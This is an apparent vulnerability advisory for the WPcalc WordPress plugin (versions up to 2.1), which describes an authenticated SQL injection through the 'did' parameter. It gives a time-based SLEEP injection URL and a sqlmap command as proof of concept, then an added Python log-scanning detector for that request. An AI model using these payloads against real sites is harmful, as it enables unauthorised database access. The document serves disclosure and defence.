WordPress Plugin Vulnerabilities
WPcalc <= 2.1 - Authenticated SQL Injection
Description
The plugin does not sanitize the 'did' parameter before using it in a SQL statement, leading to an authenticated SQL injection vulnerability.
The plugin author closed the plugin.
Proof of Concept
http://www.example.com/wp-admin/admin.php?page=wpcalc&info=del&did=1 AND (SELECT 7156 FROM (SELECT(SLEEP(5)))MIkl)

or, using the sqlmap tool:

./sqlmap.py -r request.txt -dbms=mysql --current-user -b -p did --batch --flush-session
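A detection sketch for the request shape in the proof of concept above, added here as an example and not taken from the plugin or the original advisory: it flags access-log entries for the wpcalc admin page whose 'did' value is not a plain integer. The combined log format, the function names and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PLAIN_INT = re.compile(r"[0-9]+")


def suspicious_did(log_line):
    """Return the decoded 'did' value when a wpcalc admin request carries a
    'did' that is not a plain integer; return None otherwise."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if not target.path.endswith("/wp-admin/admin.php"):
        return None
    # parse_qs percent-decodes values, so encoded payloads are compared decoded.
    params = parse_qs(target.query, keep_blank_values=True)
    if "wpcalc" not in params.get("page", []):
        return None
    for value in params.get("did", []):
        if not PLAIN_INT.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_did) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_did(line)
        if value is not None:
            hits.append((number, value))
    return hits


# Constructed sample entries; addresses come from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Dec/2021:10:00:01 +0000] "GET /wp-admin/admin.php?page=wpcalc&info=del&did=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [06/Dec/2021:10:00:09 +0000] "GET /wp-admin/admin.php?page=wpcalc&info=del&did=1%20AND%20(SELECT%207156%20FROM%20(SELECT(SLEEP(5)))MIkl) HTTP/1.1" 200 5120',
    '198.51.100.4 - - [06/Dec/2021:10:01:00 +0000] "GET /wp-admin/admin.php?page=other&did=abc HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer did={value!r}")
```

Only the query string is inspected, so a 'did' value sent in a POST body is not visible to this check.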
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
0xdecafbad
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-12-06 (about 2 years ago)
Added
2021-12-09 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)